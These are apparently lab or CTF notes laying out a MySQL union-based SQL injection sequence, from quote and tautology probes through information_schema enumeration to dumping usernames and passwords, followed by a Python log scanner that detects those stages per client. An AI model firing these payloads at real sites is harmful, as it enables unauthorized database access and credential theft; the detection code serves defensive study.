1. Determine the injection type:
?id=1
?id=1'
?id='
//not a string-type injection
?id=1 and 1
?id=1 and 1=2
?id=1 or 1
?id=1 or 1=2
?id=1 or 1#
?id=1 or 1--
//integer injection; there is a LIMIT restriction, and the comment characters are filtered
2. Guess the number of columns and the echo positions
?id=1 union select 1
?id=1 union select 1,2
?id=1 union select 1,2,3
?id=0 union select 1,2,3
3. Enumerate the database
?id=0 union select 1,database(),user()
?id=0 union select 1,@@version,@@basedir
or:
?id=0 union select 1,(select group_concat(database(),user(),version(),@@basedir)),3
4. Enumerate the tables
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),2
or:
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
5. Enumerate the columns
?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3
or:
?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273
6. Dump the column values
?id=0 union select 1,(select group_concat(concat_ws(char(32,58,32),id,username,password)) from users),3
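As an added defender-side example (not part of the original notes), the following Python scans web-server access-log lines for the stages of the union-based enumeration sequence above and rolls the hits up per client, so a client that walks the whole chain (quote probe, tautology, union, information_schema, group_concat, hex-encoded table name) stands out from a single odd request. The log lines, client addresses and the /item.php path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Heuristic signatures, one per stage of the enumeration sequence in the notes above.
SIGNATURES = {
    "quote_probe":  re.compile(r"'\s*$"),                                           # ?id=1'  ?id='
    "tautology":    re.compile(r"\b(or|and)\s+\d+\s*(=\s*\d+)?\s*(#|--|$)", re.I),  # or 1=2, and 1#
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),               # column count / echo position
    "fingerprint":  re.compile(r"\b(database|user|version)\s*\(\)|@@(version|basedir)\b", re.I),
    "schema_enum":  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "concat_dump":  re.compile(r"\b(group_concat|concat_ws)\s*\(", re.I),
    "hex_literal":  re.compile(r"=\s*0x[0-9a-f]{4,}\b", re.I),                    # table_name=0x7573657273
}

# Common/combined log format: client ip ... "METHOD target HTTP/x"
REQUEST_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/')

def score_query(query_string):
    """Return the signature names matched by one URL query string, after percent-decoding."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Yield (client_ip, path, matched_signatures) for each request that trips a signature."""
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        path, _, query = target.partition("?")
        hits = score_query(query)
        if hits:
            yield ip, path, hits

def stages_per_client(lines):
    """Collapse hits per client: many distinct stages from one client means the
    whole enumeration chain is being walked, not just one malformed request."""
    stages = defaultdict(set)
    for ip, _, hits in scan_access_log(lines):
        stages[ip].update(hits)
    return {ip: sorted(s) for ip, s in stages.items()}

# Constructed sample log lines (not from any real server); the payloads mirror the notes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=1%27 HTTP/1.1" 500 210',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /item.php?id=1%20or%201%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /item.php?id=0%20union%20select%201,2,3 HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:13:56:30 +0000] "GET /item.php?id=0%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273 HTTP/1.1" 200 780',
    '192.168.1.9 - - [10/Oct/2023:13:57:02 +0000] "GET /item.php?id=42&sort=name HTTP/1.1" 200 900',
]
```

Running `stages_per_client(SAMPLE_LOG)` reports only 10.0.0.5, with all six stages it tripped; the benign client never appears.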